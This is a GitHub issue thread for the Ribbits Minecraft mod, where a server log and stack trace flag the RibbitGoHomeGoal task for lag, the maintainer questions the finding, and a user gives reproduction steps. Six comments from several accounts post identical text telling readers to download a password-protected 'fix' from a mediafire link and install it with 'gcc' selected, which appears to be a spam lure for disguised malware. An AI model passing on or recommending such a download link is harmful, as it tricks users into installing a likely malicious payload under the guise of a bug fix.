### ISSUE TITLE
java.lang.Exception: Entity AI Task lag

### ISSUE THREAD

**Issue by Mallowmere** [yungnickyoung/Ribbits#16]
[06:35:16] [Server thread/INFO]: EntiyRibbit at:class_2338{x=1472, y=67, z=4651} dim: 384 is lagging, likely culprit task is:RibbitGoHomeGoal
[06:35:16] [Server thread/INFO]: Pausing entity AI due to lag, last 20 ticks took:168ms. Stacktrace below, let the mod author know(not performant, the entities mod author)
java.lang.Exception: Entity AI Task lag
        at com.performant.coremod.entity.ai.CustomGoalSelector.method_6275(CustomGoalSelector.java:464) ~[performant-fabric-1.20.1-13.10.jar:?]
        at net.minecraft.class_1308.method_6023(class_1308.java:771) ~[server-intermediary.jar:?]
        at net.minecraft.class_1309.method_6007(class_1309.java:2673) ~[server-intermediary.jar:?]
        at net.minecraft.class_1308.method_6007(class_1308.java:550) ~[server-intermediary.jar:?]
        at net.minecraft.class_1296.method_6007(class_1296.java:128) ~[server-intermediary.jar:?]
        at com.yungnickyoung.minecraft.ribbits.entity.RibbitEntity.method_6007(RibbitEntity.java:165) ~[Ribbits-1.20.1-Fabric-3.0.0.jar:?]
        at net.minecraft.class_1309.method_5773(class_1309.java:2419) ~[server-intermediary.jar:?]
        at net.minecraft.class_1308.method_5773(class_1308.java:351) ~[server-intermediary.jar:?]
        at net.minecraft.class_3218.observable$track(class_3218.java:19254) ~[server-intermediary.jar:?]
        at net.minecraft.class_3218.redirect$feg000$observable$onTickNonPassenger(class_3218.java:19270) ~[server-intermediary.jar:?]
        at net.minecraft.class_3218.method_18762(class_3218.java:739) ~[server-intermediary.jar:?]
        at net.minecraft.class_1937.mixinextras$bridge$accept$197(class_1937.java) ~[server-intermediary.jar:?]
        at com.bawnorton.neruina.handler.TickHandler.safelyTickEntities(TickHandler.java:92) ~[Neruina-2.1.1-fabric+1.20.1.jar:?]
        at net.minecraft.class_1937.wrapOperation$fdg000$neruina$catchTickingEntities$notTheCauseOfTickLag(class_1937.java:11548) ~[server-intermediary.jar:?]
        at net.minecraft.class_1937.method_18472(class_1937.java:480) ~[server-intermediary.jar:?]
        at net.minecraft.class_3218.method_31420(class_3218.java:385) ~[server-intermediary.jar:?]
        at net.minecraft.class_5574.method_31791(class_5574.java:54) ~[server-intermediary.jar:?]
        at net.minecraft.class_3218.method_18765(class_3218.java:353) ~[server-intermediary.jar:?]
        at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:897) ~[server-intermediary.jar:?]
        at net.minecraft.class_3176.method_3813(class_3176.java:283) ~[server-intermediary.jar:?]
        at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:824) ~[server-intermediary.jar:?]
        at net.minecraft.server.MinecraftServer.handler$bon000$carpet$modifiedRunLoop(MinecraftServer.java:19942) ~[server-intermediary.jar:?]
        at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:650) ~[server-intermediary.jar:?]
        at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:265) ~[server-intermediary.jar:?]
        at java.lang.Thread.run(Thread.java:840) ~[?:?]

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yungnickyoung** [comment]
Not really sure why Performant would be flagging the RibbitGoHomeGoal as causing lag. It's a very simple goal that basically just updates the entity's navigation target.

**Comment by codec-d** [comment]
can confirm this causes a ton of lag. to recreate, place a ribbit, holding an instrument, into a 1 block pen with 3 sides of fences and 1 side 3 blocks (high) of stone
